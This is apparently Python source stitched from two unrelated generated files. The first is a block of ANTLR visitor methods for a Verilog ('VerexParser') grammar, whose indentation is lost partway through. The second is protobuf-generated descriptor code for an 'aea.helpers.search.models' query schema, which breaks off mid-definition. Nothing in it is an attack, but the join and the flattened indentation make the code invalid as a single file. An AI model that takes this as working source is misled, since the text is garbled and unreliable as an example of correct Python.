    def visitConstant_function_call(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_call.
    def visitFunction_call(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#system_function_call.
    def visitSystem_function_call(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#genvar_function_call.
    def visitGenvar_function_call(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#base_expression.
    def visitBase_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#constant_base_expression.
    def visitConstant_base_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#constant_expression.
    def visitConstant_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#constant_mintypmax_expression.
    def visitConstant_mintypmax_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#constant_range_expression.
    def visitConstant_range_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#dimension_constant_expression.
    def visitDimension_constant_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#term.
    def visitTerm(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#lsb_constant_expression.
    def visitLsb_constant_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#mintypmax_expression.
    def visitMintypmax_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_path_conditional_expression.
    def visitModule_path_conditional_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_path_expression.
    def visitModule_path_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_path_mintypmax_expression.
    def visitModule_path_mintypmax_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#msb_constant_expression.
    def visitMsb_constant_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#width_constant_expression.
    def visitWidth_constant_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#constant_primary.
    def visitConstant_primary(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_path_primary.
    def visitModule_path_primary(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#unary_operator.
    def visitUnary_operator(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#binary_operator.
    def visitBinary_operator(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#unary_module_path_operator.
    def visitUnary_module_path_operator(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#binary_module_path_operator.
    def visitBinary_module_path_operator(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#number.
    def visitNumber(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#timing_spec.
    def visitTiming_spec(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#attribute_instance.
    def visitAttribute_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#attr_spec.
    def visitAttr_spec(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#attr_name.
    def visitAttr_name(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#block_identifier.
    def visitBlock_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#cell_identifier.
def visitCell_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#config_identifier.
def visitConfig_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#escaped_arrayed_identifier.
def visitEscaped_arrayed_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#event_identifier.
def visitEvent_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_identifier.
def visitFunction_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#gate_instance_identifier.
def visitGate_instance_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#generate_block_identifier.
def visitGenerate_block_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#genvar_function_identifier.
def visitGenvar_function_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#genvar_identifier.
def visitGenvar_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_block_identifier.
def visitHierarchical_block_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_event_identifier.
def visitHierarchical_event_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_function_identifier.
def visitHierarchical_function_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_identifier.
def visitHierarchical_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_net_identifier.
def visitHierarchical_net_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_variable_identifier.
def visitHierarchical_variable_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_task_identifier.
def visitHierarchical_task_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#inout_port_identifier.
def visitInout_port_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#input_port_identifier.
def visitInput_port_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#instance_identifier.
def visitInstance_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#library_identifier.
def visitLibrary_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#memory_identifier.
def visitMemory_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_identifier.
def visitModule_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_instance_identifier.
def visitModule_instance_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_identifier.
def visitNet_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#output_port_identifier.
def visitOutput_port_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#parameter_identifier.
def visitParameter_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#port_identifier.
def visitPort_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#real_identifier.
def visitReal_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#simple_arrayed_identifier.
def visitSimple_arrayed_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#specparam_identifier.
def visitSpecparam_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#system_function_identifier.
def visitSystem_function_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#system_task_identifier.
def visitSystem_task_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#task_identifier.
def visitTask_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#terminal_identifier.
def visitTerminal_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#topmodule_identifier.
def visitTopmodule_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#udp_identifier.
def visitUdp_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#udp_instance_identifier.
def visitUdp_instance_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#variable_identifier.
def visitVariable_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#simple_hierarchical_branch.
def visitSimple_hierarchical_branch(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#escaped_hierarchical_branch.
def visitEscaped_hierarchical_branch(self, ctx):
return self.visitChildren(ctx)
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: models.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name="models.proto",
package="aea.helpers.search.models",
syntax="proto3",
serialized_options=b"H\001",
serialized_pb=b'\n\x0cmodels.proto\x12\x19\x61\x65\x61.helpers.search.models"\xc1\x19\n\x05Query\x1a\xc0\x01\n\tAttribute\x12\x0c\n\x04name\x18\x01 \x01(\t\x12=\n\x04type\x18\x02 \x01(\x0e\x32/.aea.helpers.search.models.Query.Attribute.Type\x12\x10\n\x08required\x18\x03 \x01(\x08\x12\x13\n\x0b\x64\x65scription\x18\x04 \x01(\t"?\n\x04Type\x12\n\n\x06\x44OUBLE\x10\x00\x12\x07\n\x03INT\x10\x01\x12\x08\n\x04\x42OOL\x10\x02\x12\n\n\x06STRING\x10\x03\x12\x0c\n\x08LOCATION\x10\x04\x1an\n\tDataModel\x12\x0c\n\x04name\x18\x01 \x01(\t\x12>\n\nattributes\x18\x02 \x03(\x0b\x32*.aea.helpers.search.models.Query.Attribute\x12\x13\n\x0b\x64\x65scription\x18\x03 \x01(\t\x1a$\n\x08Location\x12\x0b\n\x03lon\x18\x01 \x01(\x01\x12\x0b\n\x03lat\x18\x02 \x01(\x01\x1a\x99\x01\n\x05Value\x12\x10\n\x06string\x18\x01 \x01(\tH\x00\x12\x10\n\x06\x64ouble\x18\x02 \x01(\x01H\x00\x12\x11\n\x07\x62oolean\x18\x03 \x01(\x08H\x00\x12\x11\n\x07integer\x18\x04 \x01(\x03H\x00\x12=\n\x08location\x18\x05 \x01(\x0b\x32).aea.helpers.search.models.Query.LocationH\x00\x42\x07\n\x05value\x1aN\n\x08KeyValue\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x35\n\x05value\x18\x02 \x01(\x0b\x32&.aea.helpers.search.models.Query.Value\x1a\x80\x01\n\x08Instance\x12\x39\n\x05model\x18\x01 \x01(\x0b\x32*.aea.helpers.search.models.Query.DataModel\x12\x39\n\x06values\x18\x02 \x03(\x0b\x32).aea.helpers.search.models.Query.KeyValue\x1a+\n\nStringPair\x12\r\n\x05\x66irst\x18\x01 \x01(\t\x12\x0e\n\x06second\x18\x02 \x01(\t\x1a(\n\x07IntPair\x12\r\n\x05\x66irst\x18\x01 \x01(\x03\x12\x0e\n\x06second\x18\x02 \x01(\x03\x1a+\n\nDoublePair\x12\r\n\x05\x66irst\x18\x01 \x01(\x01\x12\x0e\n\x06second\x18\x02 \x01(\x01\x1a\x83\x01\n\x0cLocationPair\x12\x38\n\x05\x66irst\x18\x01 \x01(\x0b\x32).aea.helpers.search.models.Query.Location\x12\x39\n\x06second\x18\x02 \x01(\x0b\x32).aea.helpers.search.models.Query.Location\x1a\xa1\x02\n\x05Range\x12\x42\n\x0bstring_pair\x18\x01 \x01(\x0b\x32+.aea.helpers.search.models.Query.StringPairH\x00\x12@\n\x0cinteger_pair\x18\x02 \x01(\x0b\x32(.aea.helpers.search.models.Query.IntPairH\x00\x12\x42\n\x0b\x64ouble_pair\x18\x03 \x01(\x0b\x32+.aea.helpers.search.models.Query.DoublePairH\x00\x12\x46\n\rlocation_pair\x18\x04 \x01(\x0b\x32-.aea.helpers.search.models.Query.LocationPairH\x00\x42\x06\n\x04pair\x1aW\n\x08\x44istance\x12\x39\n\x06\x63\x65nter\x18\x01 \x01(\x0b\x32).aea.helpers.search.models.Query.Location\x12\x10\n\x08\x64istance\x18\x02 \x01(\x01\x1a\xca\x01\n\x08Relation\x12\x44\n\x08operator\x18\x01 \x01(\x0e\x32\x32.aea.helpers.search.models.Query.Relation.Operator\x12\x35\n\x05value\x18\x02 \x01(\x0b\x32&.aea.helpers.search.models.Query.Value"A\n\x08Operator\x12\x06\n\x02\x45Q\x10\x00\x12\x06\n\x02LT\x10\x01\x12\x08\n\x04LTEQ\x10\x02\x12\x06\n\x02GT\x10\x03\x12\x08\n\x04GTEQ\x10\x04\x12\t\n\x05NOTEQ\x10\x05\x1a\xca\x05\n\x03Set\x12?\n\x08operator\x18\x01 \x01(\x0e\x32-.aea.helpers.search.models.Query.Set.Operator\x12;\n\x06values\x18\x02 \x01(\x0b\x32+.aea.helpers.search.models.Query.Set.Values\x1a\xa5\x04\n\x06Values\x12\x45\n\x06string\x18\x01 \x01(\x0b\x32\x33.aea.helpers.search.models.Query.Set.Values.StringsH\x00\x12\x45\n\x06\x64ouble\x18\x02 \x01(\x0b\x32\x33.aea.helpers.search.models.Query.Set.Values.DoublesH\x00\x12\x44\n\x07\x62oolean\x18\x03 \x01(\x0b\x32\x31.aea.helpers.search.models.Query.Set.Values.BoolsH\x00\x12\x43\n\x07integer\x18\x04 \x01(\x0b\x32\x30.aea.helpers.search.models.Query.Set.Values.IntsH\x00\x12I\n\x08location\x18\x05 \x01(\x0b\x32\x35.aea.helpers.search.models.Query.Set.Values.LocationsH\x00\x1a\x16\n\x04Ints\x12\x0e\n\x06values\x18\x01 \x03(\x03\x1a\x19\n\x07\x44oubles\x12\x0e\n\x06values\x18\x01 \x03(\x01\x1a\x19\n\x07Strings\x12\x0e\n\x06values\x18\x01 \x03(\t\x1a\x17\n\x05\x42ools\x12\x0e\n\x06values\x18\x01 \x03(\x08\x1a\x46\n\tLocations\x12\x39\n\x06values\x18\x01 \x03(\x0b\x32).aea.helpers.search.models.Query.LocationB\x08\n\x06values"\x1d\n\x08Operator\x12\x06\n\x02IN\x10\x00\x12\t\n\x05NOTIN\x10\x01\x1a\xc3\x06\n\x0e\x43onstraintExpr\x12\x41\n\x03or_\x18\x01 \x01(\x0b\x32\x32.aea.helpers.search.models.Query.ConstraintExpr.OrH\x00\x12\x43\n\x04\x61nd_\x18\x02 \x01(\x0b\x32\x33.aea.helpers.search.models.Query.ConstraintExpr.AndH\x00\x12\x43\n\x04not_\x18\x03 \x01(\x0b\x32\x33.aea.helpers.search.models.Query.ConstraintExpr.NotH\x00\x12P\n\nconstraint\x18\x04 \x01(\x0b\x32:.aea.helpers.search.models.Query.ConstraintExpr.ConstraintH\x00\x1aI\n\x02Or\x12\x43\n\nexpression\x18\x01 \x03(\x0b\x32/.aea.helpers.search.models.Query.ConstraintExpr\x1aJ\n\x03\x41nd\x12\x43\n\nexpression\x18\x01 \x03(\x0b\x32/.aea.helpers.search.models.Query.ConstraintExpr\x1aJ\n\x03Not\x12\x43\n\nexpression\x18\x01 \x01(\x0b\x32/.aea.helpers.search.models.Query.ConstraintExpr\x1a\xa0\x02\n\nConstraint\x12\x16\n\x0e\x61ttribute_name\x18\x01 \x01(\t\x12\x34\n\x04set_\x18\x02 \x01(\x0b\x32$.aea.helpers.search.models.Query.SetH\x00\x12\x38\n\x06range_\x18\x03 \x01(\x0b\x32&.aea.helpers.search.models.Query.RangeH\x00\x12=\n\x08relation\x18\x04 \x01(\x0b\x32).aea.helpers.search.models.Query.RelationH\x00\x12=\n\x08\x64istance\x18\x05 \x01(\x0b\x32).aea.helpers.search.models.Query.DistanceH\x00\x42\x0c\n\nconstraintB\x0c\n\nexpression\x1a\x88\x01\n\x05Model\x12\x44\n\x0b\x63onstraints\x18\x01 \x03(\x0b\x32/.aea.helpers.search.models.Query.ConstraintExpr\x12\x39\n\x05model\x18\x02 \x01(\x0b\x32*.aea.helpers.search.models.Query.DataModelB\x02H\x01\x62\x06proto3',
)
_QUERY_ATTRIBUTE_TYPE = _descriptor.EnumDescriptor(
name="Type",
full_name="aea.helpers.search.models.Query.Attribute.Type",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="DOUBLE", index=0, number=0, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="INT", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="BOOL", index=2, number=2, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="STRING", index=3, number=3, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="LOCATION", index=4, number=4, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=183,
serialized_end=246,
)
_sym_db.RegisterEnumDescriptor(_QUERY_ATTRIBUTE_TYPE)
_QUERY_RELATION_OPERATOR = _descriptor.EnumDescriptor(
name="Operator",
full_name="aea.helpers.search.models.Query.Relation.Operator",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="EQ", index=0, number=0, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="LT", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="LTEQ", index=2, number=2, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="GT", index=3, number=3, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="GTEQ", index=4, number=4, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="NOTEQ", index=5, number=5, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=1550,
serialized_end=1615,
)
_sym_db.RegisterEnumDescriptor(_QUERY_RELATION_OPERATOR)
_QUERY_SET_OPERATOR = _descriptor.EnumDescriptor(
name="Operator",
full_name="aea.helpers.search.models.Query.Set.Operator",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="IN", index=0, number=0, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="NOTIN", index=1, number=1, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=2303,
serialized_end=2332,
)
_sym_db.RegisterEnumDescriptor(_QUERY_SET_OPERATOR)
_QUERY_ATTRIBUTE = _descriptor.Descriptor(
name="Attribute",
full_name="aea.helpers.search.models.Query.Attribute",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="aea.helpers.search.models.Query.Attribute.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="type",
full_name="aea.helpers.search.models.Query.Attribute.type",
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="required",
full_name="aea.helpers.search.models.Query.Attribute.required",
index=2,
number=3,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="description",
full_name="aea.helpers.search.models.Query.Attribute.description",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[_QUERY_ATTRIBUTE_TYPE,],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=54,
serialized_end=246,
)
_QUERY_DATAMODEL = _descriptor.Descriptor(
name="DataModel",
full_name="aea.helpers.search.models.Query.DataModel",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="aea.helpers.search.models.Query.DataModel.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="attributes",
full_name="aea.helpers.search.models.Query.DataModel.attributes",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="description",
full_name="aea.helpers.search.models.Query.DataModel.description",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=248,
serialized_end=358,
)
_QUERY_LOCATION = _descriptor.Descriptor(
name="Location",
full_name="aea.helpers.search.models.Query.Location",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="lon",
full_name="aea.helpers.search.models.Query.Location.lon",
index=0,
number=1,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="lat",
full_name="aea.helpers.search.models.Query.Location.lat",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=360,
serialized_end=396,
)
_QUERY_VALUE = _descriptor.Descriptor(
name="Value",
full_name="aea.helpers.search.models.Query.Value",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="string",
full_name="aea.helpers.search.models.Query.Value.string",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="double",
full_name="aea.helpers.search.models.Query.Value.double",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="boolean",
full_name="aea.helpers.search.models.Query.Value.boolean",
index=2,
number=3,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="integer",
full_name="aea.helpers.search.models.Query.Value.integer",
index=3,
number=4,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="location",
full_name="aea.helpers.search.models.Query.Value.location",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="value",
full_name="aea.helpers.search.models.Query.Value.value",
index=0,
containing_type=None,
fields=[],
),
],
serialized_start=399,
serialized_end=552,
)
_QUERY_KEYVALUE = _descriptor.Descriptor(
name="KeyValue",
full_name="aea.helpers.search.models.Query.KeyValue",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="aea.helpers.search.models.Query.KeyValue.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="aea.helpers.search.models.Query.KeyValue.value",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=554,
serialized_end=632,
)
_QUERY_INSTANCE = _descriptor.Descriptor(
name="Instance",
full_name="aea.helpers.search.models.Query.Instance",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="model",
full_name="aea.helpers.search.models.Query.Instance.model",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Instance.values",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=635,
serialized_end=763,
)
_QUERY_STRINGPAIR = _descriptor.Descriptor(
name="StringPair",
full_name="aea.helpers.search.models.Query.StringPair",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="first",
full_name="aea.helpers.search.models.Query.StringPair.first",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="second",
full_name="aea.helpers.search.models.Query.StringPair.second",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=765,
serialized_end=808,
)
_QUERY_INTPAIR = _descriptor.Descriptor(
name="IntPair",
full_name="aea.helpers.search.models.Query.IntPair",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="first",
full_name="aea.helpers.search.models.Query.IntPair.first",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="second",
full_name="aea.helpers.search.models.Query.IntPair.second",
index=1,
number=2,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=810,
serialized_end=850,
)
_QUERY_DOUBLEPAIR = _descriptor.Descriptor(
name="DoublePair",
full_name="aea.helpers.search.models.Query.DoublePair",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="first",
full_name="aea.helpers.search.models.Query.DoublePair.first",
index=0,
number=1,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="second",
full_name="aea.helpers.search.models.Query.DoublePair.second",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=852,
serialized_end=895,
)
_QUERY_LOCATIONPAIR = _descriptor.Descriptor(
name="LocationPair",
full_name="aea.helpers.search.models.Query.LocationPair",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="first",
full_name="aea.helpers.search.models.Query.LocationPair.first",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
